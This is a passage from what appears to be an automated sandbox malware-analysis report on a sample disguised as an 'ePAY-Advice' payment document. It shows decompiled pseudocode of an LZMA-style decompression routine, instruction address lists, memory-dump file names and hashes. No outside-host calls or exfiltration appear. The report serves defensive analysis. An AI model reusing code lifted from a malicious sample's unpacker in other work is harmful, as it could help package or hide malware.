						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}

0x00406457
0x0040645e
0x00406464
0x0040646a
0x00000000
0x0040646e
0x0040647a
0x0040647a
0x0040647a
0x00406483
0x00000000
0x00000000
0x00406489
0x00000000
0x00406490
0x00406494
0x00000000
0x00000000
0x0040649d
0x004064a0
0x004064a3
0x004064a5
0x004064a7
0x00000000
0x00000000
0x004064ad
0x004064b0
0x004064b2
0x004064b3
0x004064b6
0x004064b8
0x004064b9
0x004064bb
0x004064be
0x004064c3
0x004064c8
0x004064d1
0x004064e4
0x004064e7
0x004064f0
0x004064f3
0x0040651b
0x0040651b
0x0040651d
0x0040652b
0x0040652b
0x0040652f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040651f
0x0040651f
0x00406522
0x00406522
0x00406523
0x00406523
0x00000000
0x0040651f
0x004064f5
0x004064f9
0x004064fe
0x004064fe
0x00406507
0x0040650d
0x0040650f
0x00406512
0x00000000
0x00406518
0x00406518
0x00000000
0x00406518
0x00000000
0x00406535
0x00406535
0x00406539
0x00406de5
0x00000000
0x00406de5
0x00406542
0x00406552
0x00406555
0x00406558
0x00406558
0x00406558
0x0040655b
0x0040655b
0x0040655f
0x00000000
0x00000000
0x00406561
0x00406564
0x00406567
0x00406591
0x00406597
0x0040659e
0x00000000
0x0040659e
0x00406569
0x0040656d
0x00406570
0x00406575
0x00406575
0x00406580
0x00406586
0x00406588
0x0040658b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004065d0
0x004065d6
0x004065d9
0x004065e6
0x004065ee
0x00000000
0x00000000
0x004065a5
0x004065a5
0x004065a9
0x00406df4
0x00000000
0x00406df4
0x004065b5
0x004065c0
0x004065c0
0x004065c0
0x004065c3
0x004065c6
0x004065c9
0x004065cc
0x004065ce
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c65
0x00406c65
0x00406c6b
0x00406c71
0x00406c74
0x00406c77
0x00406c91
0x00406c94
0x00406c9a
0x00406ca5
0x00406ca5
0x00406ca7
0x00406c79
0x00406c79
0x00406c88
0x00406c8c
0x00406c8c
0x00406caa
0x00406cb1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406cb3
0x00406cb3
0x00406cb7
0x00406e66
0x00000000
0x00406e66
0x00406cc3
0x00406cca
0x00406cd2
0x00406cd2
0x00406cd2
0x00406cd5
0x00406cd8
0x00406cd8
0x00000000
0x00000000
0x004065f6
0x004065f8
0x004065fb
0x0040666c
0x0040666f
0x00406672
0x00406679
0x00406683
0x00000000
0x00406683
0x004065fd
0x00406601
0x00406604
0x00406606
0x00406609
0x0040660c
0x0040660e
0x00406611
0x00406613
0x00406618
0x0040661b
0x0040661e
0x00406622
0x00406629
0x0040662c
0x00406633
0x00406637
0x0040663f
0x0040663f
0x0040663f
0x00406639
0x00406639
0x00406639
0x0040662e
0x0040662e
0x0040662e
0x00406643
0x00406646
0x00406664
0x00406666
0x00000000
0x00406666
0x00406648
0x0040664b
0x0040664e
0x00406651
0x00406653
0x00406653
0x00406653
0x00406656
0x00406659
0x0040665b
0x0040665c
0x0040665f
0x00000000
0x00000000
0x00406895
0x00406899
0x004068b7
0x004068ba
0x004068c1
0x004068c4
0x004068c7
0x004068ca
0x004068cd
0x004068d0
0x004068d2
0x004068d9
0x004068da
0x004068dc
0x004068df
0x004068e2
0x004068e5
0x004068e5
0x004068ea
0x00000000
0x004068ea
0x0040689b
0x0040689e
0x004068a1
0x004068ab
0x00000000
0x00000000
0x004068ff
0x00406903
0x00406926
0x00406929
0x0040692c
0x00406936
0x00406905
0x00406905
0x00406908
0x0040690b
0x0040690e
0x0040691b
0x0040691e
0x0040691e
0x00000000
0x00000000
0x00406942
0x00406946
0x00000000
0x00000000
0x0040694c
0x00406950
0x00000000
0x00000000
0x00406956
0x00406958
0x0040695c
0x0040695c
0x0040695f
0x00406963
0x00000000
0x00000000
0x004069b3
0x004069b7
0x004069be
0x004069c1
0x004069c4
0x004069ce
0x00000000
0x004069ce
0x004069b9
0x00000000
0x00000000
0x004069da
0x004069de
0x004069e5
0x004069e8
0x004069eb
0x004069e0
0x004069e0
0x004069e0
0x004069ee
0x004069f1
0x004069f4
0x004069f4
0x004069f7
0x004069fa
0x004069fd
0x004069fd
0x00406a00
0x00406a07
0x00406a0c
0x00000000
0x00000000
0x00406a9a
0x00406a9a
0x00406a9e
0x00406e3c
0x00000000
0x00406e3c
0x00406aa4
0x00406aa7
0x00406aaa
0x00406aae
0x00406ab1
0x00406ab7
0x00406ab9
0x00406ab9
0x00406ab9
0x00406abc
0x00406abf
0x00000000
0x00000000
0x0040668f
0x0040668f
0x00406693
0x00406e00
0x00000000
0x00406e00
0x00406699
0x0040669c
0x0040669f
0x004066a3
0x004066a6
0x004066ac
0x004066ae
0x004066ae
0x004066ae
0x004066b1
0x004066b4
0x004066b4
0x004066b7
0x004066ba
0x00000000
0x00000000
0x004066c0
0x004066c6
0x00000000
0x00000000
0x004066cc
0x004066cc
0x004066d0
0x004066d3
0x004066d6
0x004066d9
0x004066dc
0x004066dd
0x004066e0
0x004066e2
0x004066e8
0x004066eb
0x004066ee
0x004066f1
0x004066f4
0x004066f7
0x004066fa
0x00406716
0x00406719
0x0040671c
0x0040671f
0x00406726
0x0040672a
0x0040672c
0x00406730
0x004066fc
0x004066fc
0x00406700
0x00406708
0x0040670d
0x0040670f
0x00406711
0x00406711
0x00406733
0x0040673a
0x0040673d
0x00000000
0x00406743
0x00000000
0x00406743
0x00000000
0x00406748
0x00406748
0x0040674c
0x00406e0c
0x00000000
0x00406e0c
0x00406752
0x00406755
0x00406758
0x0040675c
0x0040675f
0x00406765
0x00406767
0x00406767
0x00406767
0x0040676a
0x0040676d
0x0040676d
0x0040676d
0x00406773
0x00000000
0x00000000
0x00406775
0x00406778
0x0040677b
0x0040677e
0x00406781
0x00406784
0x00406787
0x0040678a
0x0040678d
0x00406790
0x00406793
0x004067ab
0x004067ae
0x004067b1
0x004067b4
0x004067b4
0x004067b7
0x004067bb
0x004067bd
0x00406795
0x00406795
0x0040679d
0x004067a2
0x004067a4
0x004067a6
0x004067a6
0x004067c0
0x004067c7
0x004067ca
0x00000000
0x004067cc
0x00000000
0x004067cc
0x004067ca
0x004067d1
0x004067d1
0x004067d1
0x004067d1
0x00000000
0x00000000
0x0040680c
0x0040680c
0x00406810
0x00406e18
0x00000000
0x00406e18
0x00406816
0x00406819
0x0040681c
0x00406820
0x00406823
0x00406829
0x0040682b
0x0040682b
0x0040682b
0x0040682e
0x00406831
0x00406831
0x00406837
0x004067d5
0x004067d5
0x004067d8
0x00000000
0x004067d8
0x00406839
0x00406839
0x0040683c
0x0040683f
0x00406842
0x00406845
0x00406848
0x0040684b
0x0040684e
0x00406851
0x00406854
0x00406857
0x0040686f
0x00406872
0x00406875
0x00406878
0x00406878
0x0040687b
0x0040687f
0x00406881
0x00406859
0x00406859
0x00406861
0x00406866
0x00406868
0x0040686a
0x0040686a
0x00406884
0x0040688b
0x0040688e
0x00000000
0x00406890
0x00000000
0x00406890
0x00000000
0x00406b1d
0x00406b1d
0x00406b21
0x00406e48
0x00000000
0x00406e48
0x00406b27
0x00406b2a
0x00406b2d
0x00406b31
0x00406b34
0x00406b3a
0x00406b3c
0x00406b3c
0x00406b3c
0x00406b3f
0x00000000
0x00000000
0x004068ed
0x004068ed
0x004068f0
0x00000000
0x00000000
0x00406c2c
0x00406c30
0x00406c52
0x00406c55
0x00406c5f
0x00406c62
0x00406c62
0x00000000
0x00406c62
0x00406c32
0x00406c35
0x00406c39
0x00406c3c
0x00406c3c
0x00406c3f
0x00000000
0x00000000
0x00406ce9
0x00406ced
0x00406d0b
0x00406d0b
0x00406d0b
0x00406d12
0x00406d19
0x00406d20
0x00406d20
0x00000000
0x00406d20
0x00406cef
0x00406cf2
0x00406cf5
0x00406cf8
0x00406cff
0x00406c43
0x00406c43
0x00406c46
0x00000000
0x00000000
0x00406dda
0x00406ddd
0x00000000
0x00000000
0x00406a14
0x00406a16
0x00406a1d
0x00406a1e
0x00406a20
0x00406a23
0x00000000
0x00000000
0x00406a2b
0x00406a2e
0x00406a31
0x00406a33
0x00406a35
0x00406a35
0x00406a36
0x00406a39
0x00406a40
0x00406a43
0x00406a51
0x00000000
0x00000000
0x00406d27
0x00406d27
0x00406d2a
0x00406d31
0x00000000
0x00000000
0x00406d36
0x00406d36
0x00406d3a
0x00406e72
0x00000000
0x00406e72
0x00406d40
0x00406d43
0x00406d46
0x00406d4a
0x00406d4d
0x00406d53
0x00406d55
0x00406d55
0x00406d55
0x00406d58
0x00406d5b
0x00406d5b
0x00406d5b
0x00406d5b
0x00406d5e
0x00406d5e
0x00406d62
0x00406dc2
0x00406dc5
0x00406dca
0x00406dcb
0x00406dcd
0x00406dcf
0x00406dd2
0x00406cde
0x00406cde
0x00000000
0x00406cde
0x00406d64
0x00406d6a
0x00406d6d
0x00406d70
0x00406d73
0x00406d76
0x00406d79
0x00406d7c
0x00406d7f
0x00406d82
0x00406d85
0x00406d9e
0x00406da1
0x00406da4
0x00406da7
0x00406dab
0x00406dad
0x00406dad
0x00406dae
0x00406db1
0x00406d87
0x00406d87
0x00406d8f
0x00406d94
0x00406d96
0x00406d99
0x00406d99
0x00406db4
0x00406dbb
0x00000000
0x00406dbd
0x00000000
0x00406dbd
0x00000000
0x00406a59
0x00406a5c
0x00406a92
0x00406bc2
0x00406bc2
0x00406bc2
0x00406bc2
0x00406bc5
0x00406bc5
0x00406bc8
0x00406bca
0x00406e54
0x00000000
0x00406e54
0x00406bd0
0x00406bd3
0x00000000
0x00000000
0x00406bd9
0x00406bdd
0x00406be0
0x00406be0
0x00406be0
0x00000000
0x00406be0
0x00406a5e
0x00406a60
0x00406a62
0x00406a64
0x00406a67
0x00406a68
0x00406a6a
0x00406a6c
0x00406a6f
0x00406a72
0x00406a88
0x00406a8d
0x00406ac5
0x00406ac5
0x00406ac9
0x00406af5
0x00406af7
0x00406afe
0x00406b01
0x00406b04
0x00406b04
0x00406b09
0x00406b09
0x00406b0b
0x00406b0e
0x00406b15
0x00406b18
0x00406b45
0x00406b45
0x00406b48
0x00406b4b
0x00406bbf
0x00406bbf
0x00406bbf
0x00000000
0x00406bbf
0x00406b4d
0x00406b53
0x00406b56
0x00406b59
0x00406b5c
0x00406b5f
0x00406b62
0x00406b65
0x00406b68
0x00406b6b
0x00406b6e
0x00406b87
0x00406b89
0x00406b8c
0x00406b8d
0x00406b90
0x00406b92
0x00406b95
0x00406b97
0x00406b99
0x00406b9c
0x00406b9e
0x00406ba1
0x00406ba5
0x00406ba7
0x00406ba7
0x00406ba8
0x00406bab
0x00406bae
0x00406b70
0x00406b70
0x00406b78
0x00406b7d
0x00406b7f
0x00406b82
0x00406b82
0x00406bb1
0x00406bb8
0x00406b42
0x00406b42
0x00406b42
0x00406b42
0x00000000
0x00406bba
0x00000000
0x00406bba
0x00406bb8
0x00406acb
0x00406ace
0x00406ad0
0x00406ad3
0x00406ad6
0x00406ad9
0x00406adb
0x00406ade
0x00406ae1
0x00406ae1
0x00406ae4
0x00406ae4
0x00406ae7
0x00406aee
0x00406ac2
0x00406ac2
0x00406ac2
0x00406ac2
0x00000000
0x00406af0
0x00000000
0x00406af0
0x00406aee
0x00406a74
0x00406a77
0x00406a79
0x00406a7c
0x00000000
0x00000000
0x004067db
0x004067db
0x004067df
0x00406e24
0x00000000
0x00406e24
0x004067e5
0x004067e8
0x004067eb
0x004067ee
0x004067f1
0x004067f4
0x004067f7
0x004067f9
0x004067fc
0x004067ff
0x00406802
0x00406804
0x00406804
0x00406804
0x00000000
0x00000000
0x00406966
0x00406966
0x0040696a
0x00406e30
0x00000000
0x00406e30
0x00406970
0x00406973
0x00406976
0x00406979
0x0040697b
0x0040697b
0x0040697b
0x0040697e
0x00406981
0x00406984
0x00406987
0x0040698a
0x0040698d
0x0040698e
0x00406990
0x00406990
0x00406990
0x00406993
0x00406996
0x00406999
0x0040699c
0x0040699c
0x0040699c
0x0040699f
0x004069a1
0x004069a1
0x00000000
0x00000000
0x00406be3
0x00406be3
0x00406be3
0x00406be7
0x00000000
0x00000000
0x00406bed
0x00406bf0
0x00406bf3
0x00406bf6
0x00406bf8
0x00406bf8
0x00406bf8
0x00406bfb
0x00406bfe
0x00406c01
0x00406c04
0x00406c07
0x00406c0a
0x00406c0b
0x00406c0d
0x00406c0d
0x00406c0d
0x00406c10
0x00406c13
0x00406c16
0x00406c19
0x00406c1c
0x00406c20
0x00406c22
0x00406c25
0x00000000
0x00406c27
0x004069a4
0x004069a4
0x00000000
0x004069a4
0x00406c25
0x00406e5a
0x00406e7c
0x00406e82
0x00406e84
0x00406e8b
0x00000000
0x00000000
0x00406489
0x00406e91
0x00406e91
0x00000000

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27bf3f2d71280db305e6514bcdeee96470c11e7b3e186f58d433be2447d111a6
Instruction ID: 20cbf149701654aecfc40dff313aa48f1da8dd35a22a44c357500b5e58bb095b
Opcode Fuzzy Hash: 27bf3f2d71280db305e6514bcdeee96470c11e7b3e186f58d433be2447d111a6
Instruction Fuzzy Hash: 1B816571D04229DBDF28CFA8C844BADBBB0FF44305F21816AD856BB281C7785A96DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406895 Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406895() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00406E99))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8)); // executed
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
